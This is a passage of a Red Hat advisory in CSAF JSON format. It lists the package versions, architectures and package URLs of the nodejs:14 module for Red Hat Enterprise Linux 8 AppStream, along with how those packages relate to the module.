"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "nodejs:14:8030020210126165503:229f0a1c", "product": { "name": "nodejs:14:8030020210126165503:229f0a1c", "product_id": "nodejs:14:8030020210126165503:229f0a1c", "product_identification_helper": { "purl": "pkg:rpmmod/redhat/nodejs@14:8030020210126165503:229f0a1c" } } }, { "category": "product_version", "name": "nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "product": { "name": "nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "product_id": "nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-docs@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "product": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "product_id": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.3-1.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=noarch" } } }, { "category": "product_version", "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product_id": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@23-3.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=noarch" } } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_id": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_id": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_id": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_id": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_id": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "product": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "product_id": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.14.15.4.2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=aarch64\u0026epoch=1" } } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "product": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "product_id": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "product": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "product_id": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.3-1.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=src" } } }, { "category": "product_version", "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product_id": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@23-3.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_id": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_id": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_id": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_id": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_id": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "product": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_id": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.14.15.4.2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=ppc64le\u0026epoch=1" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_id": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_id": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_id": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_id": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_id": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "product": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "product_id": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.14.15.4.2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=s390x\u0026epoch=1" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_id": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_id": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_id": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_id": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_id": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.15.4-2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64", "product": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64", "product_id": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.14.15.4.2.module%2Bel8.3.0%2B9635%2Bffdf8381?arch=x86_64\u0026epoch=1" } } } ], "category": "architecture", "name": "x86_64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, "product_reference": "nodejs:14:8030020210126165503:229f0a1c", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64" }, "product_reference": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le" }, "product_reference": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x" }, "product_reference": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src" }, "product_reference": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64" }, "product_reference": "nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64" }, "product_reference": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le" }, "product_reference": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x" }, "product_reference": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64" }, "product_reference": "nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64" }, "product_reference": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le" }, "product_reference": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x" }, "product_reference": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64" }, "product_reference": "nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64" }, "product_reference": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le" }, "product_reference": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x" }, "product_reference": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64" }, "product_reference": "nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch" }, "product_reference": "nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64" }, "product_reference": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le" }, "product_reference": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x" }, "product_reference": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64" }, "product_reference": "nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": 